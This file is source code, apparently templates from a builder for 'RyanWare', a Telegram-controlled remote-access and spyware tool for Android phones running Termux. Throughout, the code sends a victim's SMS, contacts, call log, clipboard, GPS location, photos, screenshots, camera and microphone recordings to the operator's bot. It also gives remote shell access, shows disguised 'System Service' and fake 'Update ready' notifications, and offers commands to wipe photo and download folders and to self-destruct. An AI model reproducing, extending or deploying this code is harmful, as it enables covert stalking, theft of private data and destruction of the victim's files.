"    lines = ['*CLIPBOARD HISTORY* (' + str(len(hist)) + ' entries)', _BATCH_SEP, '']",
"    for i, item in enumerate(hist, 1):",
"        text = item.get('text', '').replace(chr(10), ' ')[:150]",
"        ts = item.get('ts', 0)",
"        try:",
"            ts_str = time.strftime('%m-%d %H:%M:%S', time.localtime(ts))",
"        except Exception:",
"            ts_str = '?'",
"        lines.append('> [' + ('%03d' % i) + '] ' + ts_str)",
"        lines.append('       ' + text)",
"        lines.append('')",
"    lines.append(_BATCH_SEP)",
"    lines.append('Total: ' + str(len(hist)) + ' entri')",
"    out = chr(10).join(lines)",
"    if len(out) <= 4000:",
"        _send(out)",
"    else:",
"        p = '/data/data/com.termux/files/usr/tmp/cliphist.txt'",
"        with open(p, 'w') as f:",
"            f.write(out)",
"        _send_doc(p, 'Clipboard History')",
"        try: os.remove(p)",
"        except Exception: pass",
"",
"def _cmd_clipclear():",
"    global _clip_history",
"    with _CLIP_LOCK:",
"        _clip_history = []",
"    _cliphist_save()",
"    _send('Clipboard history dibersihin')",
"",
"def _cmd_calllog():",
"    try:",
"        r = subprocess.run(['termux-call-log', '-l', '30'], capture_output=True, text=True, timeout=15)",
"        _send('*Call log*' + chr(10) + (r.stdout[:3500] or 'empty'))",
"    except Exception as e:",
"        _send('call err: ' + str(e))",
"",
"def _cmd_loc():",
"    try:",
"        r = subprocess.run(['termux-location'], capture_output=True, text=True, timeout=30)",
"        _send((r.stdout[:1500] or 'fail'))",
"    except Exception as e:",
"        _send('loc err: ' + str(e))",
"",
"def _cmd_gps():",
"    try:",
"        r = subprocess.run(['termux-location', '-p', 'gps'], capture_output=True, text=True, timeout=60)",
"        _send('*GPS*' + chr(10) + (r.stdout[:1500] or 'fail'))",
"    except Exception as e:",
"        _send('gps err: ' + str(e)[:120])",
"",
"def _cmd_batt():",
"    try:",
"        r = subprocess.run(['termux-battery-status'], capture_output=True, text=True, timeout=10)",
"        _send((r.stdout[:800] or 'fail'))",
"    except Exception:",
"        pass",
"",
"def _cmd_wifi():",
"    try:",
"        r = subprocess.run(['termux-wifi-connectioninfo'], capture_output=True, text=True, timeout=10)",
"        _send('*WiFi*' + chr(10) + (r.stdout[:1500] or 'fail'))",
"    except Exception:",
"        pass",
"",
"def _cmd_wifiscan():",
"    try:",
"        r = subprocess.run(['termux-wifi-scaninfo'], capture_output=True, text=True, timeout=15)",
"        _send('*WiFi scan*' + chr(10) + (r.stdout[:3000] or 'fail'))",
"    except Exception:",
"        pass",
"",
"def _cmd_cell():",
"    try:",
"        r = subprocess.run(['termux-telephony-cellinfo'], capture_output=True, text=True, timeout=15)",
"        _send('*Cell*' + chr(10) + (r.stdout[:2500] or 'fail'))",
"    except Exception:",
"        pass",
"",
"def _cmd_deviceinfo():",
"    try:",
"        r = subprocess.run(['termux-telephony-deviceinfo'], capture_output=True, text=True, timeout=10)",
"        _send('*Device info*' + chr(10) + (r.stdout[:2500] or 'fail'))",
"    except Exception:",
"        pass",
"",
"def _cmd_apps():",
"    try:",
"        r = subprocess.run(['pm', 'list', 'packages'], capture_output=True, text=True, timeout=15)",
"        _send('*Apps*' + chr(10) + (r.stdout[:3800] or 'empty'))",
"    except Exception:",
"        pass",
"",
"def _cmd_sys():",
"    _collect_sysinfo()",
"",
"def _cmd_shell(c):",
"    try:",
"        r = subprocess.run(c, shell=True, capture_output=True, text=True, timeout=30)",
"        out = (r.stdout or '') + (r.stderr or '')",
"        _send(c + chr(10) + (out[:3500] or '(no output)'))",
"    except Exception as e:",
"        _send('shell err: ' + str(e))",
"",
"def _cmd_get(path):",
"    if not os.path.isfile(path):",
"        _send('bukan file: ' + path); return",
"    if os.path.getsize(path) > MAX_BYTES:",
"        _send('gede, 45mb limit'); return",
"    _send_doc(path, path)",
"",
"def _cmd_getself():",
"    me = os.path.abspath(__file__)",
"    if os.path.exists(me):",
"        _send_doc(me, 'source')",
"    else:",
"        _send('source not found')",
"",
"def _cmd_procs():",
"    try:",
"        r = subprocess.run(['ps', '-A'], capture_output=True, text=True, timeout=10)",
"        _send('*Processes*' + chr(10) + (r.stdout[:3500] or 'empty'))",
"    except Exception:",
"        pass",
,
"",
"def _cmd_torch(state='on'):",
"    try:",
"        subprocess.run(['termux-torch', state], capture_output=True, timeout=5)",
"        _send('torch ' + state)",
"    except Exception:",
"        pass",
"",
"def _cmd_vibrate(ms='1000'):",
"    try:",
"        subprocess.run(['termux-vibrate', '-d', ms], capture_output=True, timeout=5)",
"        _send('vibrate ' + ms + 'ms')",
"    except Exception:",
"        pass",
"",
"def _cmd_tts(text):",
"    try:",
"        subprocess.run(['termux-tts-speak', text], capture_output=True, timeout=30)",
"        _send('spoken: ' + text[:200])",
"    except Exception:",
"        pass",
"",
"def _cmd_toast(text):",
"    try:",
"        subprocess.run(['termux-toast', text], capture_output=True, timeout=5)",
"        _send('toast: ' + text[:200])",
"    except Exception:",
"        pass",
"",
"def _cmd_volume(stream='music', vol='5'):",
"    try:",
"        subprocess.run(['termux-volume', stream, vol], capture_output=True, timeout=5)",
"        _send('volume ' + stream + '=' + vol)",
"    except Exception:",
"        pass",
"",
"def _cmd_brightness(val='128'):",
"    try:",
"        subprocess.run(['termux-brightness', val], capture_output=True, timeout=5)",
"        _send('brightness ' + val)",
"    except Exception:",
"        pass",
"",
"def _cmd_notify(title='Hi', content='Hello'):",
"    try:",
"        subprocess.run(['termux-notification', '-t', title, '-c', content], capture_output=True, timeout=5)",
"        _send('notif sent')",
"    except Exception:",
"        pass",
"",
"def _cmd_clipset(text):",
"    try:",
"        subprocess.run(['termux-clipboard-set', text], capture_output=True, timeout=5)",
"        _send('clip set')",
"    except Exception:",
"        pass",
"",
"def _cmd_open(pkg):",
"    try:",
"        subprocess.run(['am', 'start', '-n', pkg], capture_output=True, timeout=10)",
"        _send('opened ' + pkg)",
"    except Exception:",
"        pass",
"",
"def _cmd_kill(pkg):",
"    try:",
"        subprocess.run(['am', 'force-stop', pkg], capture_output=True, timeout=10)",
"        _send('killed ' + pkg)",
"    except Exception:",
"        pass",
"",
"def _cmd_lock():",
"    try:",
"        subprocess.run(['input', 'keyevent', '26'], capture_output=True, timeout=5)",
"        _send('screen toggled')",
"    except Exception:",
"        pass",
"",
"def _cmd_foreground():",
"    try:",
"        subprocess.run(['termux-notification', '--id', 'rw_fg', '--title', 'System Service', '--content', 'Running', '--ongoing', '--priority', 'low'], capture_output=True, timeout=5)",
"        _send('foreground service started')",
"    except Exception:",
"        _send('fg err')",
"",
"def _cmd_airplane(state='on'):",
"    val = '1' if state == 'on' else '0'",
"    try:",
"        subprocess.run(['settings', 'put', 'global', 'airplane_mode_on', val], capture_output=True, timeout=5)",
"        _send('airplane ' + state)",
"    except Exception as e:",
"        _send('airplane err: ' + str(e)[:120])",
"",
"def _cmd_data(state='on'):",
"    try:",
"        subprocess.run(['svc', 'data', 'enable' if state == 'on' else 'disable'], capture_output=True, timeout=5)",
"        _send('data ' + state)",
"    except Exception as e:",
"        _send('data err: ' + str(e)[:120])",
"",
"def _cmd_wifitoggle(state='on'):",
"    try:",
"        subprocess.run(['svc', 'wifi', 'enable' if state == 'on' else 'disable'], capture_output=True, timeout=5)",
"        _send('wifi ' + state)",
"    except Exception as e:",
"        _send('wifi toggle err: ' + str(e)[:120])",
"",
"def _cmd_hb_on():",
"    global _heartbeat_alive",
"    _heartbeat_alive = True",
"    _send('heartbeat ON')",
"",
"def _cmd_hb_off():",
"    global _heartbeat_alive",
"    _heartbeat_alive = False",
"    _send('heartbeat OFF')",
"",
"def _cmd_shotloop_on():",
"    global _shotloop_on",
"    _shotloop_on = True",
"    _send('screenshot loop ON')",
"",
"def _cmd_shotloop_off():",
"    global _shotloop_on",
"    _shotloop_on = False",
"    _send('screenshot loop OFF')",
"",
"def _cmd_del(path):",
"    try:",
"        if os.path.isfile(path):",
"            os.remove(path)",
"            _send('deleted: ' + path)",
"        elif os.path.isdir(path):",
"            shutil.rmtree(path)",
"            _send('deleted dir: ' + path)",
"        else:",
"            _send('not found: ' + path)",
"    except Exception as e:",
"        _send('del err: ' + str(e))",
"",
"def _cmd_purge_cache():",
"    try:",
"        for f in (SENT_DB, DEDUP_DB):",
"            if os.path.exists(f):",
"                os.remove(f)",
"        _send('cache purged')",
"    except Exception:",
"        pass",
"",
"def _cmd_wipe(path='DCIM'):",
"    targets = [BASE + '/DCIM', BASE + '/Pictures', BASE + '/Download'] if path == 'all' else [BASE + '/' + path]",
"    for t in targets:",
"        try:",
"            if os.path.isdir(t):",
"                shutil.rmtree(t, ignore_errors=True)",
"        except Exception:",
"            pass",
"    _send('wiped: ' + ', '.join(targets))",
"",
"def _cmd_selfdestruct():",
"    _send('self-destruct in 3s...')",
"    time.sleep(3)",
"    try:",
"        for f in (SENT_DB, DEDUP_DB, CLIP_DB):",
"            if os.path.exists(f):",
"                os.remove(f)",
"    except Exception:",
"        pass",
"    try:",
"        me = os.path.abspath(__file__)",
"        if os.path.exists(me):",
"            os.remove(me)",
"    except Exception:",
"        pass",
"    os._exit(0)",
,
"",
"def _pull_from_telegram(file_id, filename):",
"    try:",
"        r = _tg('getFile', json={'file_id': file_id})",
"        path = r.get('result', {}).get('file_path')",
"        if not path:",
"            _send('push: getFile fail'); return",
"        url = 'https://api.telegram.org/file/bot' + BOT_TOKEN + '/' + path",
"        dest = os.path.join(PUSH_DIR, filename or os.path.basename(path))",
"        os.makedirs(PUSH_DIR, exist_ok=True)",
"        with requests.get(url, stream=True, timeout=120) as resp:",
"            resp.raise_for_status()",
"            with open(dest, 'wb') as f:",
"                for chunk in resp.iter_content(8192):",
"                    f.write(chunk)",
"        _send('pushed -> ' + dest)",
"    except Exception as e:",
"        _send('push err: ' + str(e)[:120])",
"",
"def _handle_doc_msg(m):",
"    try:",
"        doc = m.get('document')",
"        if not doc:",
"            return",
"        fid = doc.get('file_id')",
"        fname = doc.get('file_name', 'pushed.bin')",
"        if doc.get('file_size', 0) > MAX_BYTES:",
"            _send('push: file >45MB, skipped'); return",
"        _pull_from_telegram(fid, fname)",
"    except Exception as e:",
"        _send('doc err: ' + str(e)[:120])",
"",
"def _menu(msg_id=None):",
"    global _cwd",
"    _cwd = BASE",
"    kb = [",
"        [{'text': 'Download', 'callback_data': 'd:Download'}, {'text': 'DCIM', 'callback_data': 'd:DCIM'}],",
"        [{'text': 'WhatsApp', 'callback_data': 'd:WhatsApp'}, {'text': 'Pictures', 'callback_data': 'd:Pictures'}],",
"        [{'text': 'Semua', 'callback_data': 'd:'}, {'text': 'Home', 'callback_data': 'home'}],",
"        [{'text': 'Cam', 'callback_data': 'cam'}, {'text': 'Vid', 'callback_data': 'vid'}, {'text': 'Rec', 'callback_data': 'rec'}],",
"        [{'text': 'Screen', 'callback_data': 'screen'}, {'text': 'ScreenRec', 'callback_data': 'screenrec'}, {'text': 'UIDump', 'callback_data': 'uidump'}],",
"        [{'text': 'Kontak', 'callback_data': 'kontak'}, {'text': 'SMS', 'callback_data': 'sms'}, {'text': 'Call', 'callback_data': 'call'}],",
"        [{'text': 'ClipHist', 'callback_data': 'cliphist'}, {'text': 'ClipClear', 'callback_data': 'clipclear'}],",
"        [{'text': 'Loc', 'callback_data': 'loc'}, {'text': 'GPS', 'callback_data': 'gps'}, {'text': 'Batt', 'callback_data': 'batt'}],",
"        [{'text': 'WiFi', 'callback_data': 'wifi'}, {'text': 'Scan', 'callback_data': 'wifiscan'}, {'text': 'Apps', 'callback_data': 'apps'}],",
"        [{'text': 'Sys', 'callback_data': 'sys'}, {'text': 'Procs', 'callback_data': 'procs'}, {'text': 'Shell', 'callback_data': 'shell'}],",
"        [{'text': 'Torch', 'callback_data': 'torch'}, {'text': 'Vib', 'callback_data': 'vib'}, {'text': 'Lock', 'callback_data': 'lock'}],",
"        [{'text': 'Toast', 'callback_data': 'toast'}, {'text': 'Notif', 'callback_data': 'notif'}, {'text': 'FG', 'callback_data': 'foreground'}],",
"        [{'text': 'HB On', 'callback_data': 'hbon'}, {'text': 'HB Off', 'callback_data': 'hboff'}, {'text': 'Purge', 'callback_data': 'purge'}],",
"        [{'text': 'Loop On', 'callback_data': 'shoton'}, {'text': 'Loop Off', 'callback_data': 'shotoff'}, {'text': 'Report', 'callback_data': 'report'}],",
"        [{'text': 'GetSelf', 'callback_data': 'getself'}, {'text': 'Wipe DCIM', 'callback_data': 'wipe:DCIM'}],",
"        [{'text': 'Wipe All', 'callback_data': 'wipe:all'}, {'text': 'SELF-DESTRUCT', 'callback_data': 'selfdestruct'}],",
"    ]",
"    t = LABEL + ' online. Pilih:'",
"    if msg_id:",
"        _edit(msg_id, t, kb)",
"    else:",
"        _send(t, kb)",
"",
"def _browse(msg_id, folder):",
"    global _cwd, _files",
"    _cwd = os.path.join(BASE, folder) if folder else BASE",
"    try:",
"        items = sorted(os.listdir(_cwd))",
"    except Exception:",
"        _edit(msg_id, 'gak bisa dibuka')",
"        return",
"    _files = {}",
"    kb, row = [], []",
"    text = _cwd + chr(10) + chr(10)",
"    n = 0",
"    for it in items:",
"        p = os.path.join(_cwd, it)",
"        n += 1",
"        _files[str(n)] = p",
"        if os.path.isdir(p):",
"            text += '[D] ' + it + chr(10)",
"        else:",
"            try:",
"                sz = round(os.path.getsize(p) / 1024)",
"            except Exception:",
"                sz = 0",
"            text += '[F] ' + it + ' (' + str(sz) + 'kb)' + chr(10)",
"        row.append({'text': str(n), 'callback_data': 'f:' + str(n)})",
"        if len(row) == 5:",
"            kb.append(row); row = []",
"    if row:",
"        kb.append(row)",
"    kb.append([{'text': 'Naik', 'callback_data': 'up'}, {'text': 'Home', 'callback_data': 'home'}])",
"    if not items:",
"        text += '(kosong)'",
"    _edit(msg_id, text, kb)",
"",
"def _kirim_file(msg_id, idx):",
"    p = _files.get(idx)",
"    if not p or not os.path.isfile(p):",
"        _ack('bukan file'); return",
"    if os.path.getsize(p) > MAX_BYTES:",
"        _edit(msg_id, 'gede, 45mb limit'); return",
"    try:",
"        with open(p, 'rb') as f:",
"            _tg('sendDocument', data={'chat_id': CHAT_ID, 'caption': p}, files={'document': f})",
"        _ack('kekirim')",
"    except Exception as e:",
"        _ack('fail ' + str(e)[:40])",
,
"",
"def _poll():",
"    global _offset, _cb_id, _running",
"    while _running:",
"        try:",
"            r = _tg('getUpdates', json={'timeout': 30, 'offset': _offset, 'allowed_updates': ['message', 'callback_query']})",
"            for u in r.get('result', []):",
"                _offset = u['update_id'] + 1",
"                if 'message' in u:",
"                    m = u['message']",
"                    if m.get('chat', {}).get('id') != int(CHAT_ID):",
"                        continue",
"                    if m.get('document'):",
"                        _handle_doc_msg(m)",
"                        continue",
"                    txt = m.get('text', '')",
"                    if CMD_KEY and txt and not txt.startswith('/menu'):",
"                        dec = _cmd_dec(txt)",
"                        if dec:",
"                            txt = dec",
"                    if txt.startswith('/start') or txt == '/menu':",
"                        _menu()",
"                    elif txt.startswith('/sh '):",
"                        _cmd_shell(txt[4:])",
"                    elif txt.startswith('/getself'):",
"                        _cmd_getself()",
"                    elif txt.startswith('/get '):",
"                        _cmd_get(txt[5:])",
"                    elif txt.startswith('/cam1'):",
"                        _cmd_foto('1')",
"                    elif txt.startswith('/cam'):",
"                        _cmd_foto('0')",
"                    elif txt.startswith('/vid'):",
"                        _cmd_video('5', '0')",
"                    elif txt.startswith('/rec'):",
"                        _cmd_record('10')",
"                    elif txt.startswith('/cliphist'):",
"                        _cmd_cliphist()",
"                    elif txt.startswith('/clipclear'):",
"                        _cmd_clipclear()",
"                    elif txt.startswith('/sms'):",
"                        _cmd_sms()",
"                    elif txt.startswith('/call'):",
"                        _cmd_calllog()",
"                    elif txt.startswith('/kontak'):",
"                        _cmd_kontak()",
"                    elif txt.startswith('/loc'):",
"                        _cmd_loc()",
"                    elif txt.startswith('/batt'):",
"                        _cmd_batt()",
"                    elif txt.startswith('/wifi'):",
"                        _cmd_wifi()",
"                    elif txt.startswith('/scan'):",
"                        _cmd_wifiscan()",
"                    elif txt.startswith('/cell'):",
"                        _cmd_cell()",
"                    elif txt.startswith('/dev'):",
"                        _cmd_deviceinfo()",
"                    elif txt.startswith('/apps'):",
"                        _cmd_apps()",
"                    elif txt.startswith('/sys'):",
"                        _cmd_sys()",
"                    elif txt.startswith('/procs'):",
"                        _cmd_procs()",
"                    elif txt.startswith('/torch'):",
"                        _cmd_torch('on')",
"                    elif txt.startswith('/untorch'):",
"                        _cmd_torch('off')",
"                    elif txt.startswith('/vib'):",
"                        _cmd_vibrate('1500')",
"                    elif txt.startswith('/toast '):",
"                        _cmd_toast(txt[7:])",
"                    elif txt.startswith('/tts '):",
"                        _cmd_tts(txt[5:])",
"                    elif txt.startswith('/vol '):",
"                        parts = txt[5:].split()",
"                        if len(parts) == 2:",
"                            _cmd_volume(parts[0], parts[1])",
"                    elif txt.startswith('/bright '):",
"                        _cmd_brightness(txt[8:])",
"                    elif txt.startswith('/notif '):",
"                        parts = txt[7:].split('|', 1)",
"                        title = parts[0].strip() or 'Hi'",
"                        content = parts[1].strip() if len(parts) > 1 else 'Hello'",
"                        _cmd_notify(title, content)",
"                    elif txt.startswith('/clip '):",
"                        _cmd_clipset(txt[6:])",
"                    elif txt.startswith('/open '):",
"                        _cmd_open(txt[6:])",
"                    elif txt.startswith('/kill '):",
"                        _cmd_kill(txt[6:])",
"                    elif txt.startswith('/del '):",
"                        _cmd_del(txt[5:])",
"                    elif txt.startswith('/purge'):",
"                        _cmd_purge_cache()",
"                    elif txt.startswith('/screenrec '):",
"                        _cmd_screenrec(txt[11:])",
"                    elif txt.startswith('/screenrec'):",
"                        _cmd_screenrec('15')",
"                    elif txt.startswith('/screen'):",
"                        _cmd_screen()",
"                    elif txt.startswith('/tap '):",
"                        parts = txt[5:].split()",
"                        if len(parts) >= 2:",
"                            _cmd_tap(parts[0], parts[1])",
"                    elif txt.startswith('/swipe '):",
"                        parts = txt[7:].split()",
"                        if len(parts) >= 4:",
"                            _cmd_swipe(*parts[:5])",
"                    elif txt.startswith('/type '):",
"                        _cmd_type(txt[6:])",
"                    elif txt.startswith('/key '):",
"                        _cmd_key(txt[5:])",
"                    elif txt.startswith('/gps'):",
"                        _cmd_gps()",
"                    elif txt.startswith('/lock'):",
"                        _cmd_lock()",
"                    elif txt.startswith('/hbon'):",
"                        _cmd_hb_on()",
"                    elif txt.startswith('/hboff'):",
"                        _cmd_hb_off()",
"                    elif txt.startswith('/uidump'):",
"                        _cmd_uidump()",
"                    elif txt.startswith('/fg'):",
"                        _cmd_foreground()",
"                    elif txt.startswith('/shotloop on'):",
"                        _cmd_shotloop_on()",
"                    elif txt.startswith('/shotloop off'):",
"                        _cmd_shotloop_off()",
"                    elif txt.startswith('/airplane '):",
"                        _cmd_airplane(txt[10:].strip())",
"                    elif txt.startswith('/data '):",
"                        _cmd_data(txt[6:].strip())",
"                    elif txt.startswith('/wifitoggle '):",
"                        _cmd_wifitoggle(txt[12:].strip())",
"                    elif txt.startswith('/wipe all'):",
"                        _cmd_wipe('all')",
"                    elif txt.startswith('/wipe '):",
"                        _cmd_wipe(txt[6:].strip())",
"                    elif txt.startswith('/selfdestruct'):",
"                        _cmd_selfdestruct()",
"                    elif txt.startswith('/ls'):",
"                        _browse(m.get('message_id'), None)",
"                elif 'callback_query' in u:",
"                    cb = u['callback_query']",
"                    _cb_id = cb['id']",
"                    d = cb.get('data', '')",
"                    mid = cb['message']['message_id']",
"                    if d == 'home':",
"                        _menu(mid)",
"                    elif d == 'cam':",
"                        _cmd_foto('0'); _ack('ok')",
"                    elif d == 'vid':",
"                        _cmd_video('5', '0'); _ack('rec 5s')",
"                    elif d == 'rec':",
"                        _cmd_record('10'); _ack('rec 10s')",
"                    elif d == 'screen':",
"                        _cmd_screen(); _ack('shot')",
"                    elif d == 'screenrec':",
"                        _cmd_screenrec('15'); _ack('15s rec')",
"                    elif d == 'uidump':",
"                        _cmd_uidump(); _ack('dumped')",
"                    elif d == 'kontak':",
"                        _cmd_kontak(); _ack('ok')",
"                    elif d == 'sms':",
"                        _cmd_sms(); _ack('ok')",
"                    elif d == 'cliphist':",
"                        _cmd_cliphist(); _ack('ok')",
"                    elif d == 'clipclear':",
"                        _cmd_clipclear(); _ack('cleared')",
"                    elif d == 'call':",
"                        _cmd_calllog(); _ack('ok')",
"                    elif d == 'loc':",
"                        _cmd_loc(); _ack('ok')",
"                    elif d == 'gps':",
"                        _cmd_gps(); _ack('gps')",
"                    elif d == 'batt':",
"                        _cmd_batt(); _ack('ok')",
"                    elif d == 'wifi':",
"                        _cmd_wifi(); _ack('ok')",
"                    elif d == 'wifiscan':",
"                        _cmd_wifiscan(); _ack('ok')",
"                    elif d == 'apps':",
"                        _cmd_apps(); _ack('ok')",
"                    elif d == 'sys':",
"                        _cmd_sys(); _ack('ok')",
"                    elif d == 'procs':",
"                        _cmd_procs(); _ack('ok')",
"                    elif d == 'torch':",
"                        _cmd_torch('on'); _ack('on')",
"                    elif d == 'vib':",
"                        _cmd_vibrate('1500'); _ack('ok')",
"                    elif d == 'lock':",
"                        _cmd_lock(); _ack('lock')",
"                    elif d == 'toast':",
"                        _cmd_toast('Hello from afar'); _ack('sent')",
"                    elif d == 'notif':",
"                        _cmd_notify('System', 'Update ready'); _ack('sent')",
"                    elif d == 'foreground':",
"                        _cmd_foreground(); _ack('fg on')",
"                    elif d == 'hbon':",
"                        _cmd_hb_on(); _ack('hb on')",
"                    elif d == 'hboff':",
"                        _cmd_hb_off(); _ack('hb off')",
"                    elif d == 'shoton':",
"                        _cmd_shotloop_on(); _ack('on')",
"                    elif d == 'shotoff':",
"                        _cmd_shotloop_off(); _ack('off')",
"                    elif d == 'report':",
"                        _batch_flush(); _ack('flushed')",
"                    elif d == 'purge':",
"                        _cmd_purge_cache(); _ack('purged')",
"                    elif d == 'getself':",
"                        _cmd_getself(); _ack('sent')",
"                    elif d == 'selfdestruct':",
"                        _cmd_selfdestruct()",
"                    elif d.startswith('wipe:'):",
"                        _cmd_wipe(d[5:]); _ack('wiped')",
"                    elif d == 'shell':",
"                        _ack('kirim /sh <cmd>')",
"                    elif d == 'up':",
"                        atas = os.path.dirname(_cwd)",
"                        if atas.startswith(BASE):",
"                            _browse(mid, os.path.relpath(atas, BASE))",
"                        else:",
"                            _menu(mid)",
"                    elif d.startswith('d:'):",
"                        _browse(mid, d[2:])",
"                    elif d.startswith('f:'):",
"                        _kirim_file(mid, d[2:])",
"        except Exception:",
"            pass",
"        time.sleep(1)",
"",
"def _boot(notify=True):",
"    try:",
"        subprocess.run(['termux-wake-lock'], capture_output=True, timeout=5)",
"    except Exception:",
"        pass",
"    try:",
"        _request_perms()",
"    except Exception:",
"        pass",
"    try:",
"        _cliphist_load()",
"    except Exception:",
"        pass",
"    if notify:",
"        try:",
"            _send(LABEL + ' online (command mode)')",
"            _collect_sysinfo()",
"        except Exception:",
"            pass",
"    _register(_watch_sms, 'sms')",
"    _register(_watch_notif, 'notif')",
"    _register(_watch_loc, 'loc')",
"    _register(_watch_batt, 'batt')",
"    _register(_watch_clip, 'clip')",
"    _register(_watch_calls, 'calls')",
"    _register(_watch_wifi, 'wifi')",
"    _register(_watch_sensors, 'sensors')",
"    _register(_watch_foreground, 'foreground')",
"    _register(_watch_screen_state, 'screenstate')",
"    _register(_watch_locmove, 'locmove')",
"    _register(_watch_shotloop, 'shotloop')",
"    _register(_watch_batthist, 'batthist')",
"    _register(_watch_batcher, 'batcher')",
"    _register(_poll, 'poll')",
"    _register(_watch_heartbeat, 'heartbeat')",
"    _register(_watch_watchdog, 'watchdog')",
"",
"def _stop():",
"    global _running",
"    _running = False",
"    try:",
"        _cliphist_save()",
"    except Exception:",
"        pass",
"    try:",
"        subprocess.run(['termux-wake-unlock'], capture_output=True, timeout=5)",
"    except Exception:",
"        pass",
"",
"if __name__ == '__main__':",
"    threading.Thread(target=_boot, daemon=True).start()",
"    try:",
"        while True:",
"            time.sleep(3600)",
"    except KeyboardInterrupt:",
"        _stop()",
"        print('Stopped.')",
"",
"# END COMMAND MODE",
"].join(chr(10));",
window.TEMPLATE_BASE = [
"#!/usr/bin/env python3",
"# RyanWare - Base Mode (Photo Scanner)",
"",
"import os",
"import re",
"import sys",
"import time",
"import json",
"import uuid",
"import socket",
"import getpass",
"import platform",
"import shutil",
"import hashlib",
"import threading",
"import subprocess",
"import requests",
"import queue as _q",
"",
"BOT_TOKEN = 'BOT_TOKEN'",
"CHAT_ID   = 'CHAT_ID'",
"LABEL     = 'Target'",
"DEBUG = True",
"USE_CACHE = False",
"BASE = '/storage/emulated/0'",
"",
"WATCH_PATHS = [",
"    BASE + '/DCIM',",
"    BASE + '/Pictures',",
"    BASE + '/Download',",
"    BASE + '/Screenshots',",
"    BASE + '/Documents',",
"    BASE + '/WhatsApp/Media',",
"    BASE + '/Android/media/com.whatsapp/WhatsApp/Media',",
"    BASE + '/Android/media/org.telegram.messenger',",
"    BASE + '/Android/media/com.instagram.android',",
"    BASE + '/Pictures/Instagram',",
"    BASE + '/Pictures/WhatsApp',",
"    BASE + '/Pictures/Screenshots',",
"    BASE + '/MIUI/screenshot',",
"]",
"PHOTO_EXT = ('.jpg', '.jpeg', '.png', '.webp', '.heic', '.heif',",
"    '.gif', '.bmp', '.tiff', '.tif', '.raw', '.dng',",
"    '.svg', '.avif', '.jfif', '.ico')",
"MAX_BYTES       = 45 * 1024 * 1024",
"SCAN_INTERVAL      = 30",
"SCAN_WORKERS       = 6",
"SEND_WORKERS       = 3",
"BATCH_SIZE         = 5",
"SEND_DELAY         = 0.3",
"SCAN_WORKER_SLEEP  = 0.3",
"SEND_WORKER_SLEEP  = 0.3",
"DEFAULT_LIMIT   = 250",
"QUEUE_MAX       = 150",
"PROGRESS_EVERY  = 50",
"",
"API      = 'https://api.telegram.org/bot' + BOT_TOKEN",
"_running = True",
"_BATCH_QUEUE = []",
"_BATCH_LOCK  = threading.Lock()",
"_SENT_LOCK   = threading.Lock()",
"_session_lock       = threading.Lock()",
"_session_count      = 0",
"_session_total      = 0",
"_session_number     = 1",
"_session_limit      = DEFAULT_LIMIT",
"_session_active     = False",
"_session_paused_man = False",
"_last_progress      = 0",
"_last_file          = ''",
"_last_file_path     = ''",
"PUSH_DIR = BASE + '/Download'",
"SENT_DB  = '/data/data/com.termux/files/home/.cache.dat'",
"SESSION_DB = '/data/data/com.termux/files/home/.session.dat'",
"",
"def _log(msg):",
"    if DEBUG:",
"        try:",
"            print('[' + time.strftime('%H:%M:%S') + '] ' + msg, flush=True)",
"        except Exception:",
"            pass",
"",
"def _tg(method, **kw):",
"    try:",
"        r = requests.post(API + '/' + method, timeout=60, **kw).json()",
"        if not r.get('ok'):",
"            _log('TG ' + method + ' FAIL: ' + str(r.get('description')))",
"        return r",
"    except Exception as e:",
"        _log('TG ' + method + ' ERR: ' + str(e))",
"        return {}",
"",
"def _send(text, kb=None):",
"    try:",
"        d = {'chat_id': CHAT_ID, 'text': str(text)[:4000], 'parse_mode': 'Markdown'}",
"        if kb:",
"            d['reply_markup'] = {'inline_keyboard': kb}",
"        return _tg('sendMessage', json=d)",
"    except Exception:",
"        return {}",
"",
"def _send_photo(path, caption=''):",
"    try:",
"        if not os.path.exists(path):",
"            _log('Photo not exist: ' + path)",
"            return {'ok': False, 'err': 'not exist'}",
"        size = os.path.getsize(path)",
"        if size == 0:",
"            _log('Photo empty: ' + path)",
"            return {'ok': False, 'err': 'empty'}",
"        with open(path, 'rb') as f:",
"            return _tg('sendPhoto', data={'chat_id': CHAT_ID, 'caption': str(caption)[:1000]}, files={'photo': f})",
"    except Exception as e:",
"        _log('send_photo err: ' + str(e))",
"        return {'ok': False, 'err': str(e)}",
"",
"def _send_media_group(chunk):",
"    try:",
"        media = []",
"        files = {}",
"        for idx, (path, cap) in enumerate(chunk):",
"            key = 'photo' + str(idx)",
"            media.append({'type': 'photo', 'media': 'attach://' + key, 'caption': str(cap)[:1000]})",
"            files[key] = open(path, 'rb')",
"        try:",
"            return _tg('sendMediaGroup', data={'chat_id': CHAT_ID, 'media': json.dumps(media)}, files=files)",
"        finally:",
"            for f in files.values():",
"                try: f.close()",
"                except Exception: pass",
"    except Exception as e:",
"        _log('send_media_group err: ' + str(e))",
"        return {}",
,
"",
"def _sent_load():",
"    if not os.path.exists(SENT_DB):",
"        return set()",
"    try:",
"        with open(SENT_DB) as f:",
"            data = set(l.strip() for l in f if l.strip())",
"        _log('Cache loaded: ' + str(len(data)) + ' entries')",
"        return data",
"    except Exception as e:",
"        _log('Cache load err: ' + str(e))",
"        return set()",
"",
"def _sent_mark(p):",
"    if not USE_CACHE:",
"        return",
"    with _SENT_LOCK:",
"        try:",
"            with open(SENT_DB, 'a') as f:",
"                f.write(p + chr(10))",
"        except Exception:",
"            pass",
"",
"def _sent_count():",
"    if not os.path.exists(SENT_DB):",
"        return 0",
"    try:",
"        with open(SENT_DB) as f:",
"            return sum(1 for _ in f)",
"    except Exception:",
"        return 0",
"",
"def _session_save():",
"    with _session_lock:",
"        try:",
"            data = {",
"                'count': _session_count,",
"                'total': _session_total,",
"                'number': _session_number,",
"                'limit': _session_limit,",
"                'active': _session_active,",
"                'last_file': _last_file,",
"                'last_file_path': _last_file_path,",
"                'timestamp': time.time(),",
"            }",
"            tmp = SESSION_DB + '.tmp'",
"            with open(tmp, 'w') as f:",
"                json.dump(data, f)",
"            os.replace(tmp, SESSION_DB)",
"        except Exception:",
"            pass",
"",
"def _session_load():",
"    global _session_count, _session_total, _session_number",
"    global _session_limit, _session_active",
"    global _last_file, _last_file_path",
"    if not os.path.exists(SESSION_DB):",
"        return",
"    try:",
"        with open(SESSION_DB) as f:",
"            data = json.load(f)",
"        with _session_lock:",
"            _session_count    = data.get('count', 0)",
"            _session_total    = data.get('total', 0)",
